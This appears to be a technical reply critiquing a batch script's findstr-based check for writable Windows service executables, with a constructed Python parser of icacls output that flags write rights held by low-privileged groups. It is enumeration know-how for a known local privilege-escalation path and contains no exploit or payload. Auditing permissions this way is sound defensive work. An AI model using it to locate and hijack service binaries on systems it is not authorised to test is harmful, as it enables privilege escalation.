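The :checkweakpermissions section decides whether a service executable is writable by piping cacls through findstr /I "Users:" | findstr /I "W F". findstr treats a space-separated pattern as a list of alternatives, so that pipeline keeps any line containing the letter W or the letter F anywhere, including in the path that cacls prints on its first output line, and it never sees Modify/Change rights that spell neither. The Python below is an added example, not code from the original paste: it parses icacls output for a binary whose path the collector already knows, reduces each ACE to principal, DENY flag and rights, and reports write-capable rights held by principals every interactive user belongs to. The sample icacls output, the LOW_PRIV_PRINCIPALS list and the WRITE_RIGHTS set are constructed assumptions for the example; batch_heuristic reproduces the paste's findstr pipeline so the two can be compared on the same lines.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Principals every interactive user is a member of (assumed list for this
# example; add groups such as DOMAIN\Domain Users on a domain-joined host).
LOW_PRIV_PRINCIPALS = {
    "everyone",
    "builtin\\users",
    "nt authority\\authenticated users",
    "nt authority\\interactive",
}

# icacls rights that let the holder replace the file's contents:
# F = full control, M = modify, W = write (generic), WD = write data / append.
WRITE_RIGHTS = {"F", "M", "W", "WD"}

# Flags that describe inheritance rather than an access right.
INHERIT_FLAGS = {"I", "OI", "CI", "IO", "NP"}

# One ACE as icacls prints it: PRINCIPAL:(flag)(flag)...
ACE_RE = re.compile(r"^(?P<principal>[^:()]+?):(?P<flags>(?:\([^)]*\))+)$")


@dataclass(frozen=True)
class Ace:
    principal: str
    deny: bool
    rights: frozenset[str]


def parse_icacls(path: str, output: str) -> list[Ace]:
    """Parse the text `icacls "<path>"` printed. The caller passes the path it
    queried, so the path prefix on the first output line is stripped exactly
    instead of guessed (paths and principals may both contain spaces)."""
    aces: list[Ace] = []
    for raw in output.splitlines():
        line = raw.strip()
        if line.lower().startswith(path.lower()):
            line = line[len(path):].strip()
        m = ACE_RE.match(line)
        if not m:  # blank line, "Successfully processed" summary, or unknown text
            continue
        tokens = [t.strip().upper()
                  for group in re.findall(r"\(([^)]*)\)", m.group("flags"))
                  for t in group.split(",")]
        if "IO" in tokens:  # inherit-only: applies to children, not to this file
            continue
        aces.append(Ace(
            principal=m.group("principal").strip(),
            deny="DENY" in tokens,
            rights=frozenset(t for t in tokens if t not in INHERIT_FLAGS | {"DENY"}),
        ))
    return aces


def writable_by_low_priv(path: str, output: str) -> list[tuple[str, str]]:
    """(principal, right) pairs giving a low-privileged principal write access.
    A DENY ACE for the same principal covering a write right suppresses the
    finding. This is a per-principal simplification: real ACL evaluation walks
    the ACEs in order against every SID in the caller's token."""
    allowed: dict[str, set[str]] = {}
    denied: dict[str, set[str]] = {}
    display: dict[str, str] = {}
    for ace in parse_icacls(path, output):
        key = ace.principal.lower()
        if key not in LOW_PRIV_PRINCIPALS:
            continue
        display[key] = ace.principal
        (denied if ace.deny else allowed).setdefault(key, set()).update(ace.rights)
    findings = []
    for key, rights in allowed.items():
        if denied.get(key, set()) & WRITE_RIGHTS:
            continue
        for right in sorted(rights & WRITE_RIGHTS):
            findings.append((display[key], right))
    return findings


def batch_heuristic(output: str) -> list[str]:
    """Lines the paste's `cacls ... | findstr /I "Users:" | findstr /I "W F"`
    pipeline keeps: "Users:" present and a W or an F anywhere on the line."""
    return [line for line in output.splitlines()
            if "users:" in line.lower() and ("w" in line.lower() or "f" in line.lower())]


# Constructed icacls output for three hypothetical service binaries (not captured from a real host).
CLEAN_PATH = r"C:\Program Files\CleanSvc\svc.exe"
CLEAN_OUTPUT = CLEAN_PATH + r""" BUILTIN\Users:(RX)
                                  NT AUTHORITY\SYSTEM:(I)(F)
                                  BUILTIN\Administrators:(I)(F)

Successfully processed 1 files; Failed processing 0 files
"""
WEAK_PATH = r"C:\Apps\WeakSvc\weak.exe"
WEAK_OUTPUT = WEAK_PATH + r""" NT AUTHORITY\SYSTEM:(I)(F)
                         BUILTIN\Administrators:(I)(F)
                         BUILTIN\Users:(I)(RX)
                         NT AUTHORITY\Authenticated Users:(M)

Successfully processed 1 files; Failed processing 0 files
"""
DENIED_PATH = r"C:\Apps\DeniedSvc\denied.exe"
DENIED_OUTPUT = DENIED_PATH + r""" BUILTIN\Users:(DENY)(W)
                             BUILTIN\Users:(I)(M)
                             NT AUTHORITY\SYSTEM:(I)(F)
"""

if __name__ == "__main__":
    for p, out in [(CLEAN_PATH, CLEAN_OUTPUT), (WEAK_PATH, WEAK_OUTPUT), (DENIED_PATH, DENIED_OUTPUT)]:
        print(p, "->", writable_by_low_priv(p, out) or "no low-privileged write access")
        print("   findstr heuristic flagged:", batch_heuristic(out))
```

On the constructed samples the findstr heuristic flags the clean binary (the F in "Program Files" sits on the same line as its Users: ACE) and stays silent on the weak one (Modify carries no W or F), while the parser reports exactly the Authenticated Users Modify right and honours the DENY on the third file. Feed it the per-file icacls output you collect instead of cacls, one call per path in serviceexes.txt.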